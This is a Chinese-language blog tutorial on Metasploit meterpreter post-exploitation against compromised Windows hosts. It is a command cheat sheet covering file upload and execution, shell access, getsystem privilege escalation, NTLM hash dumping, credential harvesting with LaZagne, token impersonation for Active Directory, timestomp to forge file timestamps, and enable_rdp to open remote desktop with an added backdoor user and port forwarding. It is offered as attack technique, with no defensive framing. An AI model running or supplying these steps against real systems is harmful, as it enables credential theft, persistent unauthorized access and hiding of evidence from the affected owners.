美文网首页
MSF之meterpreter后期攻击使用方法

MSF之meterpreter后期攻击使用方法

作者: 卿酌南烛_b805 | 来源:发表于2020-03-10 17:22 被阅读0次

1、上传文件到Windows主机


简单来说,你可以上传本机的任意文件到远程目标主机中。

命令:upload <file> <destination> 

正确写法upload //root//11.exe c://11.exe

rz将物理机文件加入kali系统中

2:从windows主机下载文件

download命令可以下载远程主机上的文件

命令:download <file> <path to save> 

正确写法download c://PerfLogs//1.txt



3:在目标主机上执行exe文件

我们也可以使用execute命令在目标主机上执行应用程序

语法也非常简单

命令:execute -f <path> [options] 正确写法:execute -f c://11.exe

我们可以看到运行了

显示命令进程

ps命令会显示目标主机上所有正在运行的进程


获取目标主机的cmd

shell命令可以进入目标主机的cmd

命令:shell



获取admin权限

getsystem命令可以提权到本地系统权限


使用Hashdump转储所有hash值

我们可以使用meterpreter shell来dump目标主机的当前系统账户和密码。转储的内容是NTML哈希格式,网上有很多工具和技巧来破解它们。

选择一个下载

上面下载很慢所以我们可以借用工具lazagne

将工具上传到目标机中

在目标机中运行生成文件下载到本机


获取用户ID

getuid命令会显示主机上运行meterpreter 服务的用户


模拟任意用户(token操作)

这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助,因为在微软活动目录中,本地访问权限并没多大用,但是如果能搞到凭证尤其是管理员凭证,那就非常有用了。

incognito最开始是一个独立的应用,当你成功入侵系统后可以用它来模拟用户tokens。这个应用后来集成到了metasploit,并且最终集成到了meterpreter中,使用如下:

在meterpreter会话中加载这个模块非常简单,只要输入 use incognito命令即可

输入list_tokens -u来显示所有有效的tokens

然后我们需要模拟某个token来获取其权限。还有注意,如果成功模拟了一个token,我们可以使用getuid命令来检查当前用户ID


timestomp伪造时间戳

timestomp C:// -h   #查看帮助

timestomp -v C://2.txt   #查看时间戳

timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt


enable_rdp脚本开启3389

run post/windows/manage/enable_rdp  #开启远程桌面

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb通过enable_rdp.rb脚本可知:开启rdp是通过reg修改注册表;添加用户是调用cmd.exe 通过net user添加;端口转发是利用的portfwd命令

相关文章

网友评论

      本文标题:MSF之meterpreter后期攻击使用方法

      本文链接:https://www.haomeiwen.com/subject/dgtgdhtx.html